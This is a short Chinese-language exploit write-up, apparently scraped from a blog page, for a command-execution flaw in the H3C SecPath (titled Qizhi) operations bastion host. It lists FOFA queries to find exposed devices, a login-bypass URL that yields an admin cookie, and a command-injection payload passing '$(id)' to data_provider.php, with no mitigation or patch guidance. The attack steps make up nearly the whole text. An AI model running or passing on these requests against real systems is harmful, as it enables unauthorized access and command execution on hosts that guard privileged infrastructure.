齐治运维堡垒机后台命令执行漏洞
文章目录漏洞描述漏洞影响漏洞复现漏洞描述H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞漏洞影响H3C SecParh堡垒机漏洞复现fofa语法:app="H3C-SecPath-运维审计系统"先通过任意用户登录获取Cookie,/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%
·
漏洞描述
H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞
漏洞影响
H3C SecParh堡垒机
漏洞复现
fofa语法:
app="H3C-SecPath-运维审计系统"
icon_hash="-1657751447"
先通过任意用户登录获取Cookie,/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
命令执行payload,/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true
更多推荐
所有评论(0)